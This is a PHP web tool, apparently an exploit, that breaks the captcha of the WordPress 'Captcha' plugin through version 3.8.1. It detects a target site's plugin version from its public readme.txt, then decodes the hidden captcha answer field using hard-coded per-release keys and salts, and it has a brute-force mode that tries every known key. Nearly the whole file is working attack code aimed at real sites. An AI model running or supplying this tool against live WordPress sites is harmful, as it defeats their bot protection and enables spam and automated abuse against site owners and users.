<?php
//WordPress Captcha plugin 3.8.1 and earlier: the hidden form field is obfuscated with a key and salt
//that are fixed per plugin release (see $captcha_version below), so it can be decoded offline and the captcha bypassed
//Vulnerable versions: 3.8.1 and earlier
//Fixed in: 3.8.2 (corrected before disclosure)
//Plugin page: https://wordpress.org/plugins/captcha
/**
 * Reverse the Captcha plugin's hidden-field encoding.
 *
 * Steps, as implemented here: derive a keystream from the key/salt
 * (each 8-byte chunk is the prefix of sha1(previous_block . keystream_so_far . salt)),
 * base64-decode the input, XOR it with the keystream, and treat byte 0 as a
 * check byte: it must equal the first byte of sha1(remaining bytes).
 *
 * Only ONE byte of the digest is verified, so a wrong key/salt still yields a
 * non-false result about 1 time in 256 - a non-false return is not proof that
 * the right release key was used.
 *
 * @param string $String base64 text taken from the captcha's hidden field
 * @param string $Key    per-release key from $captcha_version
 * @param string $Salt   per-release salt from $captcha_version
 * @return string|false  decoded payload, or false when the check byte does not match
 */
function decode( $String, $Key, $Salt )
{
	// Keystream is sized to the *encoded* length; it is always at least as long as
	// the decoded bytes, and string XOR truncates to the shorter operand anyway.
	$needed    = strlen( $String );
	$block     = $Key;
	$keystream = '';
	for ( ; strlen( $keystream ) < $needed; ) {
		$block      = pack( "H*", sha1( $block . $keystream . $Salt ) );
		$keystream .= substr( $block, 0, 8 );
	}

	$plain   = base64_decode( $String ) ^ $keystream;
	$payload = substr( $plain, 1 );

	// Check byte: first byte of sha1(payload) must match the first plaintext byte.
	$expected = substr( pack( "H*", sha1( $payload ) ), 0, 1 );
	$actual   = substr( $plain, 0, 1 );
	if ( ord( $actual ^ $expected ) !== 0 ) {
		return false;
	}
	return $payload;
}
// Per-release key/salt pairs the plugin used to obfuscate the hidden answer field.
// The label (array key) is also what the version <select> submits, so keep it exact.
// Pairs for releases before 2.12 and for 3.8.0 could not be located; 3.8.0 is
// assumed to share the 3.7.9/3.8.1 pair because it did not change between those two.
$captcha_version = array (
	"2.12 to 2.34"   => array( "key" => "123",          "salt" => "BGuxLWQtKweKEMV4" ),
	"2.4 to 2.4.4"   => array( "key" => "bws2012",      "salt" => "5tOYgjaWC2VtdEWQ" ),
	"3.0 to 3.3"     => array( "key" => "bws2012",      "salt" => "5tOYgjaWC2VtdEWQ" ),
	"3.4 to 3.6"     => array( "key" => "bws18042013",  "salt" => "5tOYgjaWC2VtdEWQ" ),
	"3.7 to 3.7.2"   => array( "key" => "bws18042013",  "salt" => "5tOYgjaWC2VtdEWQ" ),
	"3.7.3 to 3.7.7" => array( "key" => "bws-17072013", "salt" => "5tOYgjaWC2VtdEWQ" ),
	"3.7.8 & 3.7.9"  => array( "key" => "bws-23082013", "salt" => "5tOYgjaWC2VtdEWQ" ),
	"3.8.0 & 3.8.1"  => array( "key" => "bws-23082013", "salt" => "5tOYgjaWC2VtdEWQ" ),
);
?>
<html>
<head><title>Captcha WP Decoder</title></head>
<body>
<h2>Get plugin version</h2>
<div name="get_plugin_version">
<form method="POST">
<br />
Target WordPress site URL (including http:// or https://, no trailing path): <input type="text" name="url" size="25" />
<input type="Submit" value="Get version!" />
</form>
<?php
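if (isset($_POST['url']))
{
	// Version discovery: fetch the plugin's public readme.txt and read its "Stable tag:" line.
	$captcha_readme_file = "/wp-content/plugins/captcha/readme.txt";
	$url = trim($_POST['url']);

	// file_get_contents() also accepts file://, php://, ftp:// ... - restrict this helper
	// to HTTP(S) so the form cannot be used to read local files on the host running it.
	$scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
	if ($scheme !== 'http' && $scheme !== 'https') {
		echo "URL must start with http:// or https://<br/>";
	} else {
		$readme_url = rtrim($url, '/') . $captcha_readme_file;
		// The URL is user input reflected into the page: escape it.
		echo htmlspecialchars($readme_url, ENT_QUOTES, 'UTF-8') . '<br/>';

		$readme = file_get_contents($readme_url);
		// Without these checks a failed fetch or a readme without the marker hit an undefined $temp[1].
		if ($readme === false || strpos($readme, 'Stable tag: ') === false) {
			echo "Could not read the plugin readme (plugin absent, request blocked, or unexpected format).";
		} else {
			$temp = explode('Stable tag: ', $readme, 2);
			$temp = explode('License', $temp[1], 2);
			$version = trim($temp[0]);
			// The version text comes from the remote site: escape before rendering.
			echo "Version found: " . htmlspecialchars($version, ENT_QUOTES, 'UTF-8');
		}
	}
}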
?>
</div>
<h2>Break captcha using the version</h2>
<div name="break_captcha">
<form method="POST">
Version:
<select name="version">
<?php
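// Build the version <select>. The label doubles as the submitted value, so emit it
// explicitly in value="" and escape it: "3.7.8 & 3.7.9" contains a bare ampersand.
foreach (array_keys($captcha_version) as $label) {
	$safe_label = htmlspecialchars($label, ENT_QUOTES, 'UTF-8');
	echo "<option value=\"" . $safe_label . "\">" . $safe_label . "</option>";
}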
?>
</select>
<br/>
Hidden string: <br />
<input type="text" name="hidden_string" /> <br/>
<input type="Submit" value="Calculate" />
</form>
<?php
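if (isset($_POST['hidden_string']) && isset($_POST['version']) && !isset($_POST['bruteforce']))
{
	$selected = $_POST['version'];
	// The version is client-controlled even though the form offers a list: reject anything
	// not in the table rather than indexing with an unknown key and running decode() with null key/salt.
	if (!isset($captcha_version[$selected])) {
		echo "Unknown version selection.";
	} else {
		$result = decode($_POST['hidden_string'], $captcha_version[$selected]['key'], $captcha_version[$selected]['salt']);
		if ($result === false) {
			// decode() returns false when its check byte does not match.
			echo "Check byte mismatch: wrong version for this hidden string, or the string is corrupted.";
		} else {
			// The decoded text originates from the target site: escape before rendering.
			echo htmlspecialchars(trim($result), ENT_QUOTES, 'UTF-8');
		}
	}
}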
?>
</div>
<h2>Bruteforce captcha</h2>
<div name="bruteforce_captcha">
<form method="POST">
Hidden string: <br />
<input type="text" name="hidden_string" /> <br/>
<input type="hidden" name="bruteforce" />
<input type="Submit" value="Calculate" />
</form>
<?php
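if (isset($_POST['hidden_string']) && isset($_POST['bruteforce']))
{
	// Try every known release key/salt and print each candidate that passes decode()'s check.
	foreach ($captcha_version as $label => $creds)
	{
		$result = decode($_POST['hidden_string'], $creds['key'], $creds['salt']);
		// decode() verifies a single check byte, so a wrong key can still pass (~1/256);
		// every candidate is shown and the operator picks the readable one.
		if ($result !== false && $result !== "") {
			// Both the label and the decoded text are rendered into HTML: escape them.
			echo "Version: " . htmlspecialchars($label, ENT_QUOTES, 'UTF-8') . ": "
				. htmlspecialchars(trim($result), ENT_QUOTES, 'UTF-8') . "<br/>";
		}
	}
}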
?>
</div>
</body>
</html>